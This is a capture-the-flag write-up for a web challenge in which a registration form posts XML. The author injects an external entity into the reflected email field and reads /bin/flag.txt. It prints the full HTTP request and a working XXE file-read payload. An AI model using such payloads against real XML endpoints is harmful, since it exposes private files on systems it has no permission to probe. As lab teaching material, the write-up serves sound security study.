Category

Web

Description

Can you read the flag at /bin/flag.txt?

Solution

Entering the page we get a registration form.

Submitting some data in the form just returns a error message.

Sorry, t1@te.com is already registered!

Taking a look at the request we can see that it’s a XML request.

POST /process.php HTTP/1.1
Host: 3.15.157.157
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 192
Origin: http://3.15.157.157
DNT: 1
Connection: close
Referer: http://3.15.157.157/
Sec-GPC: 1

<?xml version="1.0" encoding="UTF-8"?>
<root><name>t1</name><tel>1</tel><email>t1@te.com</email><password>12</password></root>

Since email is reflected, we might be able to print the flag using XXE and the email-tag.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY file SYSTEM "file:///bin/flag.txt"> ]>
<root><name>t1</name><tel>1</tel><email>&file;</email><password>12</password></root>

Now we get the flag in the response.

Sorry, ASV{XML_1S_0LD_4ND_B4D}
 is already registered!

ASV{XML_1S_0LD_4ND_B4D}